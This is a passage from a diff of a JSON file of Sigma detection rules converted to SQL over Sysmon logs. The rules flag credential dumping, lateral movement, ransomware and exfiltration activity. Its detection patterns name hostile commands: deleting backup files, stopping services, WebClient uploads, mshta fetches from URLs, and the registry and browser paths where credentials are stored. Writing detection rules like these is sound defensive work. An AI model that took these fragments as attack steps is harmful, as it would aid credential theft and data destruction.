'%\\\\pskill64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pslist.exe' ESCAPE '\\' OR Image LIKE '%\\\\pslist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psLoggedon.exe' ESCAPE '\\' OR Image LIKE '%\\\\psLoggedon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psping.exe' ESCAPE '\\' OR Image LIKE '%\\\\psping64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psService.exe' ESCAPE '\\' OR Image LIKE '%\\\\psService64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psshutdown.exe' ESCAPE '\\' OR Image LIKE '%\\\\psshutdown64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend64.exe' ESCAPE '\\' OR Image LIKE '%\\\\RAMMap.exe' ESCAPE '\\' OR Image LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR Image LIKE '%\\\\RegDelNull.exe' ESCAPE '\\' OR Image LIKE '%\\\\RegDelNull64.exe' ESCAPE '\\' OR Image LIKE '%\\\\regjump.exe' ESCAPE '\\' OR Image LIKE '%\\\\ru.exe' ESCAPE '\\' OR Image LIKE '%\\\\ru64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ShareEnum.exe' ESCAPE '\\' OR Image LIKE '%\\\\ShareEnum64.exe' ESCAPE '\\' OR Image LIKE '%\\\\shellRunas.exe' ESCAPE '\\' OR Image LIKE '%\\\\sigcheck.exe' ESCAPE '\\' OR Image LIKE '%\\\\sigcheck64.exe' ESCAPE '\\' OR Image LIKE '%\\\\streams.exe' ESCAPE '\\' OR Image LIKE '%\\\\streams64.exe' ESCAPE '\\' OR Image LIKE '%\\\\strings.exe' ESCAPE '\\' OR Image LIKE '%\\\\strings64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sync.exe' ESCAPE '\\' OR Image LIKE '%\\\\sync64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpvcon.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpvcon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpview.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpview64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Testlimit.exe' ESCAPE '\\' OR Image LIKE '%\\\\Testlimit64.exe' ESCAPE '\\' OR Image LIKE '%\\\\vmmap.exe' ESCAPE '\\' OR Image LIKE '%\\\\vmmap64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Volumeid.exe' ESCAPE '\\' OR Image LIKE '%\\\\Volumeid64.exe' ESCAPE '\\' OR Image LIKE '%\\\\whois.exe' ESCAPE '\\' OR Image LIKE '%\\\\whois64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Winobj.exe' ESCAPE '\\' OR Image LIKE '%\\\\Winobj64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ZoomIt.exe' ESCAPE '\\' OR Image LIKE '%\\\\ZoomIt64.exe' ESCAPE '\\') AND NOT ((Company IN ('Sysinternals - www.sysinternals.com', 'Sysinternals')) OR (Company = '')))" ], - "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" + "filename": "proc_creation_win_sysinternals_tools_masquerading.yml" }, { - "title": "HackTool - PurpleSharp Execution", - "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "title": "MMC20 Lateral Movement", + "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", "status": "test", - "description": "Detects the execution of the PurpleSharp adversary simulation tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", + "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", "tags": [ - "attack.t1587", - "attack.resource_development" + "attack.execution", + "attack.t1021.003" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" + "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" }, { - "title": "Potential Ryuk Ransomware Activity", - "id": "c37510b8-2107-4b78-aa32-72f251e7a844", - "status": "stable", - "description": "Detects Ryuk ransomware activity", - "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Credential Dumping Via LSASS Process Clone", + "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", + "status": "test", + "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.credential_access", + "attack.t1003", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_ryuk.yml" + "filename": "proc_creation_win_susp_lsass_clone.yml" }, { - "title": "Potential Baby Shark Malware Activity", - "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", - "status": "test", - "description": "Detects activity that could be related to Baby Shark malware", + "title": "File With Suspicious Extension Downloaded Via Bitsadmin", + "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.discovery", - "attack.t1012", - "attack.t1059.003", - "attack.t1059.001", - "attack.t1218.005" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_babyshark.yml" + "filename": "proc_creation_win_bitsadmin_download_susp_extensions.yml" }, { - "title": "Change PowerShell Policies to an Insecure Level", - "id": "87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180", + "title": "Always Install Elevated Windows Installer", + "id": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", "status": "experimental", - "description": "Detects use of executionpolicy option to set insecure policies", - "author": "frack113", + "description": "Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Administrator script" + "System administrator usage", + "Anti virus products", + "WindowsApps located in \"C:\\Program Files\\WindowsApps\\\"" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% -executionpolicy %' ESCAPE '\\' OR CommandLine LIKE '% -ep %' ESCAPE '\\' OR CommandLine LIKE '% -exec %' ESCAPE '\\') AND (CommandLine LIKE '%Unrestricted%' ESCAPE '\\' OR CommandLine LIKE '%bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\Windows\\\\Installer\\\\%' ESCAPE '\\' AND Image LIKE '%msi%' ESCAPE '\\' AND Image LIKE '%tmp' ESCAPE '\\') OR (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND IntegrityLevel = 'System')) AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\system32\\\\msiexec.exe /V' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\Sophos\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\') OR ((ParentImage LIKE 'C:\\\\Program Files\\\\Avast Software\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\%' ESCAPE '\\')) OR ((ParentImage LIKE 'C:\\\\Program Files\\\\Google\\\\Update\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_set_policies_to_unsecure_level.yml" + "filename": "proc_creation_win_susp_always_install_elevated_windows_installer.yml" }, { - "title": "Suspicious ConfigSecurityPolicy Execution", - "id": "1f0f6176-6482-4027-b151-00071af39d7e", + "title": "Potential Remote Desktop Tunneling", + "id": "8a3038e8-9c9d-46f8-b184-66234a160f6f", "status": "experimental", - "description": "Upload file, credentials or data exfiltration with Binary part of Windows Defender", - "author": "frack113", + "description": "Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.", + "author": "Tim Rauch", "tags": [ - "attack.exfiltration", - "attack.t1567" + "attack.lateral_movement", + "attack.t1021" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%ConfigSecurityPolicy.exe%' ESCAPE '\\' OR Image LIKE '%\\\\ConfigSecurityPolicy.exe' ESCAPE '\\' OR OriginalFileName = 'ConfigSecurityPolicy.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -L %' ESCAPE '\\' OR CommandLine LIKE '% -P %' ESCAPE '\\' OR CommandLine LIKE '% -R %' ESCAPE '\\' OR CommandLine LIKE '% -pw %' ESCAPE '\\' OR CommandLine LIKE '% -ssh %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_configsecuritypolicy.yml" + "filename": "proc_creation_win_susp_remote_desktop_tunneling.yml" }, { - "title": "Suspicious OfflineScannerShell.exe Execution From Another Folder", - "id": "02b18447-ea83-4b1b-8805-714a8a34546a", - "status": "test", - "description": "Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory", - "author": "frack113", + "title": "Suspicious Add User to Remote Desktop Users Group", + "id": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", + "status": "experimental", + "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.lateral_movement", + "attack.t1133", + "attack.t1136.001", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\OfflineScannerShell.exe' ESCAPE '\\' AND NOT ((CurrentDirectory LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\Offline\\\\' ESCAPE '\\') OR (CurrentDirectory = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '%Remote Desktop Users%' ESCAPE '\\' OR CommandLine LIKE '%Utilisateurs du Bureau à distance%' ESCAPE '\\' OR CommandLine LIKE '%Usuarios de escritorio remoto%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_offlinescannershell.yml" + "filename": "proc_creation_win_susp_add_user_remote_desktop_group.yml" }, { - "title": "Audit Policy Tampering Via Auditpol", - "id": "0a13e132-651d-11eb-ae93-0242ac130002", + "title": "Exports Critical Registry Keys To a File", + "id": "82880171-b475-4201-b811-e9c826cd5eaa", "status": "test", - "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", + "description": "Detects the export of a crital Registry key to a file.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.exfiltration", + "attack.t1012" ], "falsepositives": [ - "Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored" + "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine LIKE '% -E %' ESCAPE '\\') AND (CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))" ], - "filename": "proc_creation_win_auditpol_susp_execution.yml" + "filename": "proc_creation_win_regedit_export_critical_keys.yml" }, { - "title": "Potential QBot Activity", - "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", - "status": "stable", - "description": "Detects potential QBot activity by looking for process executions used previously by QBot", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Browser Data Stealing", + "id": "47147b5b-9e17-4d76-b8d2-7bac24c5ce1b", + "status": "experimental", + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005" + "attack.credential_access", + "attack.t1555.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\') OR (Image LIKE '%\\\\xcopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\robocopy.exe' ESCAPE '\\') OR OriginalFileName IN ('XCOPY.EXE', 'robocopy.exe')) AND (CommandLine LIKE '%\\\\Opera Software\\\\Opera Stable\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Mozilla\\\\Firefox\\\\Profiles%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Edge\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Google\\\\Chrome\\\\User Data\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_qbot.yml" + "filename": "proc_creation_win_susp_copy_browser_data.yml" }, { - "title": "Dism Remove Online Package", - "id": "43e32da2-fdd0-4156-90de-50dfd62636f9", + "title": "Enumeration for 3rd Party Creds From CLI", + "id": "87a476dc-0079-4583-a985-dee7a20a03de", "status": "experimental", - "description": "Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", - "author": "frack113", + "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1552.002" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\DismHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%/Online%' ESCAPE '\\' AND ParentCommandLine LIKE '%/Disable-Feature%' ESCAPE '\\') OR (Image LIKE '%\\\\Dism.exe' ESCAPE '\\' AND CommandLine LIKE '%/Online%' ESCAPE '\\' AND CommandLine LIKE '%/Disable-Feature%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\SimonTatham\\\\PuTTY\\\\SshHostKeys\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Mobatek\\\\MobaXterm\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\WOW6432Node\\\\Radmin\\\\v3.0\\\\Server\\\\Parameters\\\\Radmin%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\FoxmailPreview%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Aerofox\\\\Foxmail\\\\V3.1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\IncrediMail\\\\Identities%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Qualcomm\\\\Eudora\\\\CommandLine%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RimArts\\\\B2\\\\Settings%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenVPN-GUI\\\\configs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\Martin Prikryl\\\\WinSCP 2\\\\Sessions%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\FTPWare\\\\COREFTP\\\\Sites%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\DownloadManager\\\\Passwords%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\OpenSSH\\\\Agent\\\\Keys%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\TightVNC\\\\Server%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\ORL\\\\WinVNC3\\\\Password%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Software\\\\RealVNC\\\\WinVNC4%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_dsim_remove.yml" + "filename": "proc_creation_win_registry_enumeration_for_credentials_cli.yml" }, { - "title": "Add SafeBoot Keys Via Reg Utility", - "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", + "title": "Service StartupType Change Via Sc.EXE", + "id": "85c312b7-f44d-4a51-a024-d671c40b49fc", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", + "description": "Detect the use of \"sc.exe\" to change the startup type of a service to \"disabled\" or \"demand\"", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "False positives may occur with troubleshooting scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '% config %' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND (CommandLine LIKE '%disabled%' ESCAPE '\\' OR CommandLine LIKE '%demand%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_add_safeboot.yml" + "filename": "proc_creation_win_sc_disable_service.yml" }, { - "title": "Suspicious Cmdl32 Execution", - "id": "f37aba28-a9e6-4045-882c-d5004043b337", - "status": "experimental", - "description": "lolbas Cmdl32 is use to download a payload to evade antivirus", - "author": "frack113", + "title": "DNS Exfiltration and Tunneling Tools Execution", + "id": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "status": "test", + "description": "Well-known DNS Exfiltration tools execution", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.exfiltration", + "attack.t1048.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1132.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR OriginalFileName = 'CMDL32.EXE') AND (CommandLine LIKE '%/vpn %' ESCAPE '\\' AND CommandLine LIKE '%/lan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iodine.exe' ESCAPE '\\' OR Image LIKE '%\\\\dnscat2%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cmdl32.yml" + "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml" }, { - "title": "Suspicious CMD Shell Output Redirect", - "id": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", + "title": "Gzip Archive Decode Via PowerShell", + "id": "98767d61-b2e8-4d71-b661-e36783ee24c1", "status": "experimental", - "description": "Detects inline windows shell commands redirecting output via the \">\" symbol to a suspicious location", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1218" - ], + "description": "Detects attempts of decoding encoded Gzip archives via PowerShell.", + "author": "Hieu Tran", "falsepositives": [ - "Legitimate admin scripts" + "Legitimate administrative scripts may use this functionality. Use \"ParentImage\" in combination with the script names and allowed users and applications to filter legitimate executions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ((CommandLine LIKE '%> \\%USERPROFILE\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%APPDATA\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TEMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TMP\\%\\\\%' 